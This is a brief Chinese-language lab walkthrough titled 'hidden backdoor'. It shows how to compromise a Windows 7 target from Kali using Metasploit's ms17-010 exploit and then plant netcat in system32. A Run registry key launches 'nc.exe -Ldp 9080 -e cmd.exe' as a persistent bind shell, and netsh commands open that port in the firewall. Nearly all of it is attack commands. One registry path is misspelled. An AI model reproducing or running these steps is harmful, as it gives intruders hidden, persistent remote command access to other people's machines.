隐藏后门

靶机windows7 x64

攻击机 kali

探测目标ip地址:

nmap -Pn 192.168.156.1

search ms17-010

set Rhosts …

set lhost …

1.nc后门上传

upload /root/nc.exe c:\windows\system32

2.修改注册表

  • reg enumkey -k HKLM\software\microsoft\windows\currentversion\run //查询键值
  • reg setval -k HKLM\software\microsoft\window\currentversion\run -v nc -d ‘C:\windows\system32\nc.exe -Ldp 9080 -e cmd.exe’ //添加nc键值
  • reg queryval -k HKLM\software\microsoft\windows\currentversion\run -v nc //查询指定键值的内容

nc 192.168.56.12 9080

3.防火墙,允许端口

  • Shell //生成shell
  • cmd: netsh firewall show opmode //查看防火墙状态
  • netsh firewall add portopening tcp 9080 “textx” ENABLE ALL //小写tcp不可以,必须大写!
  • netsh firewall add portopening TCP 9080 “QQ1” ENABLE ALL

需关闭目标防火墙修改端口才会生效!!!